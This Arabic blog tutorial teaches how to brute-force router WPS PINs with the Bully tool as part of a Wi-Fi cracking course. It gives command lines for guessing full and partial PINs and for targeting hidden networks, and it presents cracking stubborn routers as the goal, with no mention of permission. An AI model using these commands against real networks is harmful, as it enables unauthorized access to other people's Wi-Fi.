شرح الأداة Bully لتخمين على WPS Pin | Hackshow Blog Hackshowblog

ربنا لاتؤاخذنا ان نسينا او اخطئنا ربنا ولا تحمل علينا اصرا كما حملته على الذين من قبلنا ربنا لا تحملنا مالا طاقة لنا به واعف عنا واغفر لنا وارحمنا انت مولانا فانصرنا على القوم الكافرين

dimanche 20 juillet 2014
13:24

شرح الأداة Bully لتخمين على WPS Pin

advertisements


السلام عليكم ورحمة الله وبركاته 


نكمل شرح دورة فك تشفير الشبكات 

بشرح لاداة Bully

طبعا اداة مبنية على Reaver وقوية جدا

وتم تطويرها مباشرة بعد اخر نسخة لReaver يعني بالتحديد 2011 



وتمت إظافة خيارات متقدمة وقوية لتخطي مشاكل

 وتحكم في كل إتصالات 

أتناء عملية التخمين بحيث أنها نحجت في فك تشفير أصعب الرواتر

المستعصية خصوصا Technicolor 


طبعا Reaver حتى هو يستطيع فك تشفير


وأنا قمت بفك تشفير به ولكن يجب أن تقوم باظافة 

بعض إعدادات بنفسك


اما Bully فهي تقوم بفعل بعض أشياء بطريقة أتوماتكية


مهم كي لا أطيل عليكم اترككم مع الفديو





ملاحظة : بامكان تخمين بثمانية أرقام ولكن يجب أن تظيف خيار

-B : Bruteforce checksum Digit

بحيت يصبح الأمر متلا :

bully -b <Mac> 
-c channel -B -p 12345678 mon0

checksum    هذه الطريقة تعتمد على صناعة 


 الخاص بثمانية أرقام ومقارنتها مع التي يرسلها الراوتر

طريقة تجريب PIN الأخرى  :



لو أفترضنا أنك تعرفه كيف ستقوم بالتأكد من أنه شغال 

Pin : 12345678

bully -b <Mac> -c channel -p 1234567 -S mon0

لو لاحظت في أمر فوق 7 أرقام وليس 8 

سبب ذلك أن أداة تقوم بتخمين الرقم الباقي لوحدها
 
لذلك وضعنا أمر S- 

لكي يقوم بتخمين بطريقة مرتبة - تصاعدية - وليس عشوائية



أيضا لمن يريد بدأ عملية التخمين من رقم معين : 




bully -b <Mac> -c channel -p 12340000 mon0

يعني نحن نعرف أربع أرقام الأولى نريد التخمين فقط على الباقي

 لذلك عوضناها بالصفر .

بامكانك تنفيد الأمر كما تريد مهم أن تضع الصفر مكان

 الأرقام التي لاتعرفها


التخمين على الشبكات المخفية : 

أولا يجب أن تحصل على :

ESSID : اسم الشبكة 


BSSID : ماك ادرس الشبكة 


channel : رقم الشانيل

تم شرح الطريقة في الدرس السابق

تفضل


لو كنت تريد طريقة سهلة استخدم برامج مثل  INSSIDER

,WirelessNetView , Winhotspot , Homedate ,NetSurveyor

مهم بعد حصولك على تلك المعلومات

ستطبق الأمر تالي  لو كنت تعرف PIN :


bully -b BSSID -c channel -e "ESSID" -p 12345678 mon0

أمر التخمين العادي : 

bully -b BSSID -c channel -e "ESSID"  mon0


ملاحظة :

لو كان اسم الشبكة فيه فراغ وجب أن تضع كما مشروح فوق


" Te s t W i f i"

ليصبح الأمر : 

bully -b BSSID -c channel -e "Te s t W i f i"  mon0


صورة لعملية البروت فورس 




صورة لعدم وجود خدمة WPS على الرواتر الهدف




رابط التحميل :


أداة تأتي منصبة إفتراضيا على كالي لينكس


وتوزيعات الأمنية المختصة بالشبكات

رابط على موقع  قوقل كود لم يعد شغال

تم التخلي عن مشروع

Mediafire

GUFUP


 مشكلة تنصيب  : 




root@kali:~/bully/src # make
cc -I`pwd` -I`pwd`/utils/ -I`pwd`/tls/ -I`pwd`/wps/ -I`pwd`/crypto/ -I`pwd`/common/ -o bully bully.c -lpcap -lssl -lcrypto
bully.c:25:18: fatal error: pcap.h: No such file or directory
compilation terminated.
make: *** [bully] Error 1


حل :


 sudo apt-get install libpcap-dev


 مشكلة تنصيب  : 



cc -Ipwd -Ipwd/utils/ -Ipwd/tls/ -Ipwd/wps/ -Ipwd/crypto/ -Ipwd/common/ -o bully bully.c -lpcap -lssl -lcrypto
In file included from bully.c:63:0:
crypto/crypto_openssl.c:16:30: fatal error: openssl/opensslv.h: No such file or directory
#include 
^
compilation terminated.
make: *** [bully] Error 1



حل :



apt-get install libssl-dev

وبعدها قم بإعادة عملية ورح تقوم بتنصيبه بدون مشاكل 


حفظ الجلسات وإعادة نقلها إلى جهاز أخر لو كنت تشتغل LIVE 

شرح لأخ مصطفى




في أمان الله 



قـد يـهمـك أيــضا ..

كـريمَ

مــبرمج و مهتم بأمن المعلومات و بجديد التقنيات سبق لي ان قدمت دورات امنية و برمجية, و الطريق طويل بادن الله

-

1 commentaires :